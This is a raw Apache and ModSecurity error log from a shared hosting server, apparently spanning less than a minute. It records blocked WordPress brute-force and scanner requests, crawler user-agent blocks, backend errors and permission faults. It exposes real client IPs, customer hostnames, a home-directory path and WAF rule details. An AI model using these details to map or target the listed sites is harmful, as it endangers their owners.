[Tue May 26 14:10:03.935866 2026] [security2:error] [pid 585807:tid 585960] [client 192.141.113.174:9897] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 174.113.141.192.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/xmlrpc.php"] [unique_id "ahVcY-Hp6I37JgAKrHUWIQAAAJs"]
[Tue May 26 14:10:03.936014 2026] [security2:error] [pid 585807:tid 585960] [client 192.141.113.174:9897] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "filosha.com"] [uri "/xmlrpc.php"] [unique_id "ahVcY-Hp6I37JgAKrHUWIQAAAJs"]
[Tue May 26 14:10:04.496344 2026] [security2:error] [pid 585807:tid 585969] [client 43.173.176.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVcZOHp6I37JgAKrHUWOgAAAKQ"]
[Tue May 26 14:10:04.824790 2026] [security2:error] [pid 585807:tid 585997] [client 20.206.67.134:4823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVcZOHp6I37JgAKrHUWSgAAAMA"]
[Tue May 26 14:10:05.444117 2026] [security2:error] [pid 585807:tid 586054] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcZeHp6I37JgAKrHUWUAAAAPg"]
[Tue May 26 14:10:06.810479 2026] [security2:error] [pid 585807:tid 586059] [client 95.70.131.179:63827] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVcZuHp6I37JgAKrHUWfQAAAP0"]
[Tue May 26 14:10:06.812294 2026] [security2:error] [pid 585807:tid 586059] [client 95.70.131.179:63827] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVcZuHp6I37JgAKrHUWfQAAAP0"]
[Tue May 26 14:10:07.518030 2026] [security2:error] [pid 585807:tid 585951] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcZ-Hp6I37JgAKrHUWjQAAAJM"]
[Tue May 26 14:10:08.063021 2026] [security2:error] [pid 585807:tid 585956] [client 202.141.30.10:35336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcaOHp6I37JgAKrHUWsAAAAJg"]
[Tue May 26 14:10:08.063150 2026] [security2:error] [pid 585807:tid 585956] [client 202.141.30.10:35336] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcaOHp6I37JgAKrHUWsAAAAJg"]
[Tue May 26 14:10:09.553212 2026] [security2:error] [pid 585807:tid 586037] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcaeHp6I37JgAKrHUWzgAAAOg"]
[Tue May 26 14:10:10.971580 2026] [security2:error] [pid 585807:tid 585976] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcauHp6I37JgAKrHUW9gAAAKs"]
[Tue May 26 14:10:13.401998 2026] [security2:error] [pid 585807:tid 585808] [remote 111.225.149.88:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kingsclub.in"] [uri "/robots.txt"] [unique_id "ahVcbeHp6I37JgAKrHUXRwAA_gA"]
[Tue May 26 14:10:13.500378 2026] [security2:error] [pid 585807:tid 586066] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcbeHp6I37JgAKrHUXQAAAAQQ"]
[Tue May 26 14:10:14.610370 2026] [security2:error] [pid 585807:tid 586000] [client 47.11.228.82:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcbuHp6I37JgAKrHUXYQAAAMM"]
[Tue May 26 14:10:15.593880 2026] [security2:error] [pid 585807:tid 585997] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcb-Hp6I37JgAKrHUXegAAAMA"]
[Tue May 26 14:10:16.753863 2026] [security2:error] [pid 585807:tid 585910] [remote 103.27.200.76:54564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.200.27.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVccOHp6I37JgAKrHUXowAAhWY"]
[Tue May 26 14:10:17.664101 2026] [security2:error] [pid 585807:tid 585909] [remote 13.215.26.74:33982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.26.215.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVcceHp6I37JgAKrHUXxwAAsWU"]
[Tue May 26 14:10:17.709454 2026] [security2:error] [pid 585807:tid 585997] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcceHp6I37JgAKrHUXvQAAAMA"]
[Tue May 26 14:10:18.380943 2026] [security2:error] [pid 585807:tid 586011] [client 193.37.33.152:20459] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahVcceHp6I37JgAKrHUXwwAAAM4"]
[Tue May 26 14:10:19.212306 2026] [security2:error] [pid 585807:tid 586063] [client 202.141.30.10:35362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcc-Hp6I37JgAKrHUX-QAAAQE"]
[Tue May 26 14:10:19.212476 2026] [security2:error] [pid 585807:tid 586063] [client 202.141.30.10:35362] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcc-Hp6I37JgAKrHUX-QAAAQE"]
[Tue May 26 14:10:19.232526 2026] [security2:error] [pid 585807:tid 585959] [client 83.217.213.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVcceHp6I37JgAKrHUX2wAAAJo"], referer: http://anujtradingco.com/homepages/shop-parallax/
[Tue May 26 14:10:19.247580 2026] [security2:error] [pid 585807:tid 585938] [client 66.249.89.232:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVccuHp6I37JgAKrHUX6QAAAIY"]
[Tue May 26 14:10:19.696099 2026] [security2:error] [pid 585807:tid 586042] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcc-Hp6I37JgAKrHUYAwAAAOw"]
[Tue May 26 14:10:20.984081 2026] [security2:error] [pid 585807:tid 585966] [client 95.70.131.179:63373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVcdOHp6I37JgAKrHUYPAAAAKE"]
[Tue May 26 14:10:20.984202 2026] [security2:error] [pid 585807:tid 585966] [client 95.70.131.179:63373] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVcdOHp6I37JgAKrHUYPAAAAKE"]
[Tue May 26 14:10:21.214935 2026] [security2:error] [pid 585807:tid 585987] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcdOHp6I37JgAKrHUYNwAAALY"]
[Tue May 26 14:10:22.674863 2026] [security2:error] [pid 585807:tid 585831] [remote 123.30.233.13:50008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVcduHp6I37JgAKrHUYXwAAvhc"]
[Tue May 26 14:10:23.164212 2026] [security2:error] [pid 585807:tid 586003] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcduHp6I37JgAKrHUYaAAAAMY"]
[Tue May 26 14:10:25.624195 2026] [security2:error] [pid 585807:tid 585997] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVceeHp6I37JgAKrHUYrQAAAMA"]
[Tue May 26 14:10:27.190527 2026] [security2:error] [pid 585807:tid 585845] [remote 47.128.46.83:39294] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/"] [unique_id "ahVce-Hp6I37JgAKrHUY3wAAzSU"]
[Tue May 26 14:10:27.221637 2026] [security2:error] [pid 585807:tid 585841] [remote 88.198.91.116:60644] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVce-Hp6I37JgAKrHUY2wAApSE"]
[Tue May 26 14:10:27.707065 2026] [proxy:warn] [pid 585807:tid 586037] [client 45.79.115.134:37425] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 14:10:27.800519 2026] [security2:error] [pid 585807:tid 585945] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVce-Hp6I37JgAKrHUY4wAAAI0"]
[Tue May 26 14:10:27.865990 2026] [security2:error] [pid 585807:tid 585983] [client 45.79.115.134:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVce-Hp6I37JgAKrHUY8AAAALI"]
[Tue May 26 14:10:27.866860 2026] [security2:error] [pid 585807:tid 586037] [client 45.79.115.134:37425] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/400.shtml"] [unique_id "ahVce-Hp6I37JgAKrHUY7gAAAOg"]
[Tue May 26 14:10:27.934208 2026] [security2:error] [pid 585807:tid 585843] [remote 103.11.102.106:47828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVce-Hp6I37JgAKrHUY8QAA1CM"]
[Tue May 26 14:10:29.802432 2026] [security2:error] [pid 585807:tid 586018] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcfeHp6I37JgAKrHUZGwAAANU"]
[Tue May 26 14:10:29.873026 2026] [security2:error] [pid 585807:tid 585952] [client 202.141.30.10:35382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcfeHp6I37JgAKrHUZJwAAAJQ"]
[Tue May 26 14:10:29.873164 2026] [security2:error] [pid 585807:tid 585952] [client 202.141.30.10:35382] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcfeHp6I37JgAKrHUZJwAAAJQ"]
[Tue May 26 14:10:31.908888 2026] [lsapi:error] [pid 585807:tid 586004] [client 66.249.64.46:0] [host mosykay.com] Error receiving response header (lsphp is killed?): ReceiveResponseHeader: receive pkg hdr failed: ReceivePkgHdr: nothing to read from backend (LVE ID 1035; user ID 1035), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html
[Tue May 26 14:10:31.910940 2026] [lsapi:error] [pid 585807:tid 585982] [client 66.249.64.41:0] [host mosykay.com] Error receiving response header (lsphp is killed?): ReceiveResponseHeader: receive pkg hdr failed: ReceivePkgHdr: nothing to read from backend (LVE ID 1035; user ID 1035), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html
[Tue May 26 14:10:31.913744 2026] [lsapi:error] [pid 585807:tid 585964] [client 66.249.64.161:0] [host doyecpa.com] Error receiving response header (lsphp is killed?): ReceiveResponseHeader: receive pkg hdr failed: ReceivePkgHdr: nothing to read from backend (LVE ID 1035; user ID 1035), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html
[Tue May 26 14:10:31.914528 2026] [lsapi:error] [pid 585807:tid 586052] [client 66.249.64.166:0] [host doyecpa.com] Error receiving response header (lsphp is killed?): ReceiveResponseHeader: receive pkg hdr failed: ReceivePkgHdr: nothing to read from backend (LVE ID 1035; user ID 1035), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html
[Tue May 26 14:10:31.917095 2026] [lsapi:error] [pid 585807:tid 585973] [client 57.141.2.55:0] [host mosykay.com] Error receiving response header (lsphp is killed?): ReceiveResponseHeader: receive pkg hdr failed: ReceivePkgHdr: nothing to read from backend (LVE ID 1035; user ID 1035), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html
[Tue May 26 14:10:31.917102 2026] [lsapi:error] [pid 585807:tid 585984] [client 74.7.243.210:0] [host billing.mosykay.com] Connect to backend failed with CONNECTION_RESET on sending request(GET /?path=//sys/bus/node/devices/node0/cpu5/node0/memory289/subsystem/devices/memory59/node0/memory12 HTTP/1.1); uri(/?path=//sys/bus/node/devices/node0/cpu5/node0/memory289/subsystem/devices/memory59/node0/memory12): ReceiveAckHdr: backend reset connection: errno 104 (possibly memlimit for LVE ID 1035 with UID 1035 too small), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html, referer: https://billing.mosykay.com/?path=//sys/bus/node/devices/node0/cpu5/node0/memory289/subsystem/devices/memory59/node0
[Tue May 26 14:10:31.917466 2026] [lsapi:error] [pid 585807:tid 586021] [client 66.249.64.173:0] [host doyecpa.com] Connect to backend failed with CONNECTION_RESET on sending request(GET /prizes/223990359%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class= HTTP/1.1); uri(/index.php): ReceiveAckHdr: backend reset connection: errno 104 (possibly memlimit for LVE ID 1035 with UID 1035 too small), check http://docs.cloudlinux.com/mod_lsapi_troubleshooting.html
[Tue May 26 14:10:34.109543 2026] [security2:error] [pid 585807:tid 586050] [client 202.76.164.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcgOHp6I37JgAKrHUZcgAAAPQ"]
[Tue May 26 14:10:34.118305 2026] [security2:error] [pid 585807:tid 586057] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcgeHp6I37JgAKrHUZgQAAAPs"]
[Tue May 26 14:10:34.340523 2026] [security2:error] [pid 585807:tid 585968] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcgeHp6I37JgAKrHUZlAAAAKM"]
[Tue May 26 14:10:36.392250 2026] [security2:error] [pid 585807:tid 585958] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcg-Hp6I37JgAKrHUZxQAAAJk"]
[Tue May 26 14:10:38.871436 2026] [security2:error] [pid 585807:tid 585972] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVchuHp6I37JgAKrHUZ_gAAAKc"]
[Tue May 26 14:10:39.654549 2026] [core:crit] [pid 585807:tid 586046] (13)Permission denied: [client 157.55.39.16:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:10:40.052224 2026] [core:crit] [pid 585807:tid 585989] (13)Permission denied: [client 157.55.39.16:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:10:40.738020 2026] [security2:error] [pid 585807:tid 585986] [client 202.141.30.10:65309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVciOHp6I37JgAKrHUaRQAAALU"]
[Tue May 26 14:10:40.738150 2026] [security2:error] [pid 585807:tid 585986] [client 202.141.30.10:65309] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVciOHp6I37JgAKrHUaRQAAALU"]
[Tue May 26 14:10:40.742737 2026] [core:crit] [pid 585807:tid 585976] (13)Permission denied: [client 157.55.39.16:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:10:40.884405 2026] [security2:error] [pid 585807:tid 585994] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVciOHp6I37JgAKrHUaPAAAAL0"]
[Tue May 26 14:10:41.386948 2026] [core:crit] [pid 585807:tid 586012] (13)Permission denied: [client 157.55.39.16:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:10:43.058363 2026] [security2:error] [pid 585807:tid 586031] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVciuHp6I37JgAKrHUajAAAAOI"]
[Tue May 26 14:10:44.050352 2026] [core:crit] [pid 585807:tid 585947] (13)Permission denied: [client 52.167.144.236:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:10:44.279810 2026] [core:crit] [pid 585807:tid 586052] (13)Permission denied: [client 40.77.167.235:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:10:44.472533 2026] [core:crit] [pid 585807:tid 586031] (13)Permission denied: [client 52.167.144.236:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:10:45.275944 2026] [security2:error] [pid 585807:tid 586049] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcjOHp6I37JgAKrHUa2QAAAPM"]
[Tue May 26 14:10:46.772264 2026] [security2:error] [pid 585807:tid 585974] [client 47.128.121.161:62926] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "www.toronto121mortgages.com"] [uri "/index.cgi"] [unique_id "ahVcjuHp6I37JgAKrHUbBgAAAKk"], referer: http://www.toronto121mortgages.com/robots.txt
[Tue May 26 14:10:47.691562 2026] [security2:error] [pid 585807:tid 586047] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcj-Hp6I37JgAKrHUbIwAAAPE"]
[Tue May 26 14:10:49.934144 2026] [security2:error] [pid 585807:tid 585947] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVckeHp6I37JgAKrHUbbAAAAI8"]
[Tue May 26 14:10:51.886854 2026] [security2:error] [pid 585807:tid 586017] [client 202.141.30.10:65492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVck-Hp6I37JgAKrHUbswAAANQ"]
